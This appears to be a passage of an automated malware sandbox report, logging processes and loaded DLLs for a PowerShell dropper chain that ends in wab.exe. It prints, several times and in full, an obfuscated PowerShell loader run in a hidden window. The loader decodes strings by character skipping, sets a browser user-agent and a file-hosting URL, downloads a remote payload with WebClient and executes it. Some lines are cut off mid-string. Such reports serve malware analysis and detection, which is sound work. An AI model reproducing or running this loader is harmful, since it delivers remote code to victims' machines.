depsnedkl.alkiiAutontSofav( Baro$EnklaSHygroppiqueiheav,sMeteoeOpbudsHals tBie.dekamm.lDydsk).orsv ');$Skraaremmens=$Parapod[0];$Kriminalromans= (Circuted 'Orgel$Zonopgun,erlUdstoobrdskbBostra V,sslUnbal:PositAAabnin.airbdVect,eUmedgfPagi.aP ohidVandleFlagsrArgene CactnRhota=CykelNEppieeDalr wNitzh-UdradO SletbPaaklj,oacceRabarcSlumptSmurr DiplaSUncolyPil.rsCattatB.sageEjendmF rda. SvigNSprngeBeslutZapti. Co,dWHusbaegan,tbHypocCTopollOestriThumbe Bi on Skldt');$Kriminalromans+=$Nonstudy[1];Udkrte ($Kriminalromans);Udkrte (Circuted 'Fiksp$U,derAOmstinHampsdhyposeI iqufOlo,ea Rectd,rinteStudirUndsae.zarinAlphi. UtilHSaccaeHesseaDiaspd SbireFilmar PttssSemec[Tknin$ VirkP,pdrauBestilEmbralExpeloskraluOpsamtGamblsCorru] Mill=gente$ComorO MidtnUfordtspecio Ef el C lio Fodgg.valmi Uns.cIstanaKaravlSlag. ');$Ame
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Klavers.Uen && echo t"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Sanguinarily='Sub';$Sanguinarily+='strin';$Colour = 1;$Sanguinarily+='g';Function Circuted($Kropsvisiteret26){$Blazer=$Kropsvisiteret26.Length-$Colour;For($Tvrfljte=5;$Tvrfljte -lt $Blazer;$Tvrfljte+=6){$Intraperitoneally+=$Kropsvisiteret26.$Sanguinarily.Invoke( $Tvrfljte, $Colour);}$Intraperitoneally;}function Udkrte($Udmatningens){ . ($Polarizer) ($Udmatningens);}$Ontological=Circuted 'AlenlMGynobo AnimzCopiei Dekll UnbrlKaramaD,esk/ Abso5 edrr.C.apt0Clemp Notc(Dru,nWunifoiNailenPr.madCo.seoUnbuiwSheepsfrste MetalNUnderTL ndq Prede1Scrip0Postt.Penty0 dra.;Gidsl Spnd,WP ddii.rembnBa ng6 ,ram4B roc;Rkebi RaasxTermt6 D.ej4 Kn.r;Ringt LassorDiscjvCa.bi:archt1Bicen2Aftgt1O,tol. Sile0Sulfo)Diver Prof.G,fglaePen,acFalk,k Fi,hoNethi/Admir2Encin0Griff1 Tram0Cytis0M,tro1lufti0Kben 1Mech, ForblFDr.gaigkantrD,mmee Forrf gelsoSlag,x Sia./Lande1 Un i2Denot1Baand. E eb0 Sost ';$Pullouts=Circuted ' Eva,U,epousLu tleNonderMange- MellACamorgbkarveTo.fun UnpotZeppe ';$Skraaremmens=Circuted 'Gim ehLusketSidettSamlepcalcas Bo.i: Circ/Lseti/TruthwbackfwRegiswUbesl. karisDec neineq nCo kadBerylsRiotep lichaadaptcJenh,eGlott.BademcA osto .aktmD.ght/HydropDecimrH,spioDamas/Homeod.aretlXerot/ DesiiVi li4Gjord1 FreeaLupan7 alvf6 Loes ';$Spisestel=Circuted 'Bolte>Cubin ';$Polarizer=Circuted 'S irriFlykkeRa,idxKonst ';$Spiegeleisen='Decephalize';$Thermoremanent12 = Circuted ' Hecte Frejc,vigehPrem,oUdtry Udska%Klemea FolkpNogggpAgnindgvenda.odsetRegloaarchi%Krimi\uv.asKunivelNonada mishv PalbeTal,yrOmop sGassl.B,dstUAposteDyppen Eino .verl& Sprj&Te,no Scane Kongc ModehPollaojejun Varu tWindi ';Udkrte (Circuted 'Nonsy$IndisgFeriel,anneoUgerabOutlaaAnti l,rist:WillyNMytolo,rocenun ersStilitBraktuUnsh d FascySurli=Kdest(BeforcProtom OverdVolde Flers/Unde.cDisin Whabb$ G,amTHjemmh araleScarvrSe uemUsnoboKardirRoeddePeri,mHenhraI,difnLurefegerman .omet ,lle1Over 2Sub.e) ,und ');Udkrte (Circuted 'averr$Luf,egFaerdlTaphvoBru.sbArchpa Flytl Diss:TurnePTautoaResigrGorinaSel.kpNonaroNrmeldRev,l=Co.on$AkkusSSuperk C enrActedaOplseaAf,kir ilmeDi tam gattm T.leeLrlinnSk,bssPopul. fyris U depsnedkl.alkiiAutontSofav( Baro$EnklaSHygroppiqueiheav,sMeteoeOpbudsHals tBie.dekamm.lDydsk).orsv ');$Skraaremmens=$Parapod[0];$Kriminalromans= (Circuted 'Orgel$Zonopgun,erlUdstoobrdskbBostra V,sslUnbal:PositAAabnin.airbdVect,eUmedgfPagi.aP ohidVandleFlagsrArgene CactnRhota=CykelNEppieeDalr wNitzh-UdradO SletbPaaklj,oacceRabarcSlumptSmurr DiplaSUncolyPil.rsCattatB.sageEjendmF rda. SvigNSprngeBeslutZapti. Co,dWHusbaegan,tbHypocCTopollOestriThumbe Bi on Skldt');$Kriminalromans+=$Nonstudy[1];Udkrte ($Kriminalromans);Udkrte (Circuted 'Fiksp$U,derAOmstinHampsdhyposeI iqufOlo,ea Rectd,rinteStudirUndsae.zarinAlphi. UtilHSaccaeHesseaDiaspd SbireFilmar PttssSemec[Tknin$ VirkP,pdrauBestilEmbralExpeloskraluOpsamtGamblsCorru] Mill=gente$ComorO MidtnUfordtspecio Ef el C lio Fodgg.valmi Uns.cI
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Klavers.Uen && echo t"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Sanguinarily='Sub';$Sanguinarily+='strin';$Colour = 1;$Sanguinarily+='g';Function Circuted($Kropsvisiteret26){$Blazer=$Kropsvisiteret26.Length-$Colour;For($Tvrfljte=5;$Tvrfljte -lt $Blazer;$Tvrfljte+=6){$Intraperitoneally+=$Kropsvisiteret26.$Sanguinarily.Invoke( $Tvrfljte, $Colour);}$Intraperitoneally;}function Udkrte($Udmatningens){ . ($Polarizer) ($Udmatningens);}$Ontological=Circuted 'AlenlMGynobo AnimzCopiei Dekll UnbrlKaramaD,esk/ Abso5 edrr.C.apt0Clemp Notc(Dru,nWunifoiNailenPr.madCo.seoUnbuiwSheepsfrste MetalNUnderTL ndq Prede1Scrip0Postt.Penty0 dra.;Gidsl Spnd,WP ddii.rembnBa ng6 ,ram4B roc;Rkebi RaasxTermt6 D.ej4 Kn.r;Ringt LassorDiscjvCa.bi:archt1Bicen2Aftgt1O,tol. Sile0Sulfo)Diver Prof.G,fglaePen,acFalk,k Fi,hoNethi/Admir2Encin0Griff1 Tram0Cytis0M,tro1lufti0Kben 1Mech, ForblFDr.gaigkantrD,mmee Forrf gelsoSlag,x Sia./Lande1 Un i2Denot1Baand. E eb0 Sost ';$Pullouts=Circuted ' Eva,U,epousLu tleNonderMange- MellACamorgbkarveTo.fun UnpotZeppe ';$Skraaremmens=Circuted 'Gim ehLusketSidettSamlepcalcas Bo.i: Circ/Lseti/TruthwbackfwRegiswUbesl. karisDec neineq nCo kadBerylsRiotep lichaadaptcJenh,eGlott.BademcA osto .aktmD.ght/HydropDecimrH,spioDamas/Homeod.aretlXerot/ DesiiVi li4Gjord1 FreeaLupan7 alvf6 Loes ';$Spisestel=Circuted 'Bolte>Cubin ';$Polarizer=Circuted 'S irriFlykkeRa,idxKonst ';$Spiegeleisen='Decephalize';$Thermoremanent12 = Circuted ' Hecte Frejc,vigehPrem,oUdtry Udska%Klemea FolkpNogggpAgnindgvenda.odsetRegloaarchi%Krimi\uv.asKunivelNonada mishv PalbeTal,yrOmop sGassl.B,dstUAposteDyppen Eino .verl& Sprj&Te,no Scane Kongc ModehPollaojejun Varu tWindi ';Udkrte (Circuted 'Nonsy$IndisgFeriel,anneoUgerabOutlaaAnti l,rist:WillyNMytolo,rocenun ersStilitBraktuUnsh d FascySurli=Kdest(BeforcProtom OverdVolde Flers/Unde.cDisin Whabb$ G,amTHjemmh araleScarvrSe uemUsnoboKardirRoeddePeri,mHenhraI,difnLurefegerman .omet ,lle1Over 2Sub.e) ,und ');Udkrte (Circuted 'averr$Luf,egFaerdlTaphvoBru.sbArchpa Flytl Diss:TurnePTautoaResigrGorinaSel.kpNonaroNrmeldRev,l=Co.on$AkkusSSuperk C enrActedaOplseaAf,kir ilmeDi tam gattm T.leeLrlinnSk,bssPopul. fyris U depsnedkl.alkiiAutontSofav( Baro$EnklaSHygroppiqueiheav,sMeteoeOpbudsHals tBie.dekamm.lDydsk).orsv ');$Skraaremmens=$Parapod[0];$Kriminalromans= (Circuted 'Orgel$Zonopgun,erlUdstoobrdskbBostra V,sslUnbal:PositAAabnin.airbdVect,eUmedgfPagi.aP ohidVandleFlagsrArgene CactnRhota=CykelNEppieeDalr wNitzh-UdradO SletbPaaklj,oacceRabarcSlumptSmurr DiplaSUncolyPil.rsCattatB.sageEjendmF rda. SvigNSprngeBeslutZapti. Co,dWHusbaegan,tbHypocCTopollOestriThumbe Bi on Skldt');$Kriminalromans+=$Nonstudy[1];Udkrte ($Kriminalromans);Udkrte (Circuted 'Fiksp$U,derAOmstinHampsdhyposeI iqufOlo,ea Rectd,rinteStudirUndsae.zarinAlphi. UtilHSaccaeHesseaDiaspd SbireFilmar PttssSemec[Tknin$ VirkP,pdrauBestilEmbralExpeloskraluOpsamtGamblsCorru] Mill=gente$ComorO MidtnUfordtspecio Ef el C lio Fodgg.valmi Uns.cIstanaKaravlSlag. ');$AmeJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Klavers.Uen && echo t"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Sanguinarily='Sub';$Sanguinarily+='strin';$Colour = 1;$Sanguinarily+='g';Function Circuted($Kropsvisiteret26){$Blazer=$Kropsvisiteret26.Length-$Colour;For($Tvrfljte=5;$Tvrfljte -lt $Blazer;$Tvrfljte+=6){$Intraperitoneally+=$Kropsvisiteret26.$Sanguinarily.Invoke( $Tvrfljte, $Colour);}$Intraperitoneally;}function Udkrte($Udmatningens){ . ($Polarizer) ($Udmatningens);}$Ontological=Circuted 'AlenlMGynobo AnimzCopiei Dekll UnbrlKaramaD,esk/ Abso5 edrr.C.apt0Clemp Notc(Dru,nWunifoiNailenPr.madCo.seoUnbuiwSheepsfrste MetalNUnderTL ndq Prede1Scrip0Postt.Penty0 dra.;Gidsl Spnd,WP ddii.rembnBa ng6 ,ram4B roc;Rkebi RaasxTermt6 D.ej4 Kn.r;Ringt LassorDiscjvCa.bi:archt1Bicen2Aftgt1O,tol. Sile0Sulfo)Diver Prof.G,fglaePen,acFalk,k Fi,hoNethi/Admir2Encin0Griff1 Tram0Cytis0M,tro1lufti0Kben 1Mech, ForblFDr.gaigkantrD,mmee Forrf gelsoSlag,x Sia./Lande1 Un i2Denot1Baand. E eb0 Sost ';$Pullouts=Circuted ' Eva,U,epousLu tleNonderMange- MellACamorgbkarveTo.fun UnpotZeppe ';$Skraaremmens=Circuted 'Gim ehLusketSidettSamlepcalcas Bo.i: Circ/Lseti/TruthwbackfwRegiswUbesl. karisDec neineq nCo kadBerylsRiotep lichaadaptcJenh,eGlott.BademcA osto .aktmD.ght/HydropDecimrH,spioDamas/Homeod.aretlXerot/ DesiiVi li4Gjord1 FreeaLupan7 alvf6 Loes ';$Spisestel=Circuted 'Bolte>Cubin ';$Polarizer=Circuted 'S irriFlykkeRa,idxKonst ';$Spiegeleisen='Decephalize';$Thermoremanent12 = Circuted ' Hecte Frejc,vigehPrem,oUdtry Udska%Klemea FolkpNogggpAgnindgvenda.odsetRegloaarchi%Krimi\uv.asKunivelNonada mishv PalbeTal,yrOmop sGassl.B,dstUAposteDyppen Eino .verl& Sprj&Te,no Scane Kongc ModehPollaojejun Varu tWindi ';Udkrte (Circuted 'Nonsy$IndisgFeriel,anneoUgerabOutlaaAnti l,rist:WillyNMytolo,rocenun ersStilitBraktuUnsh d FascySurli=Kdest(BeforcProtom OverdVolde Flers/Unde.cDisin Whabb$ G,amTHjemmh araleScarvrSe uemUsnoboKardirRoeddePeri,mHenhraI,difnLurefegerman .omet ,lle1Over 2Sub.e) ,und ');Udkrte (Circuted 'averr$Luf,egFaerdlTaphvoBru.sbArchpa Flytl Diss:TurnePTautoaResigrGorinaSel.kpNonaroNrmeldRev,l=Co.on$AkkusSSuperk C enrActedaOplseaAf,kir ilmeDi tam gattm T.leeLrlinnSk,bssPopul. fyris U depsnedkl.alkiiAutontSofav( Baro$EnklaSHygroppiqueiheav,sMeteoeOpbudsHals tBie.dekamm.lDydsk).orsv ');$Skraaremmens=$Parapod[0];$Kriminalromans= (Circuted 'Orgel$Zonopgun,erlUdstoobrdskbBostra V,sslUnbal:PositAAabnin.airbdVect,eUmedgfPagi.aP ohidVandleFlagsrArgene CactnRhota=CykelNEppieeDalr wNitzh-UdradO SletbPaaklj,oacceRabarcSlumptSmurr DiplaSUncolyPil.rsCattatB.sageEjendmF rda. SvigNSprngeBeslutZapti. Co,dWHusbaegan,tbHypocCTopollOestriThumbe Bi on Skldt');$Kriminalromans+=$Nonstudy[1];Udkrte ($Kriminalromans);Udkrte (Circuted 'Fiksp$U,derAOmstinHampsdhyposeI iqufOlo,ea Rectd,rinteStudirUndsae.zarinAlphi. UtilHSaccaeHesseaDiaspd SbireFilmar PttssSemec[Tknin$ VirkP,pdrauBestilEmbralExpeloskraluOpsamtGamblsCorru] Mill=gente$ComorO MidtnUfordtspecio Ef el C lio Fodgg.valmi Uns.cIJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Klavers.Uen && echo t"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
              Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: bcp47langs.dllJump to behavior
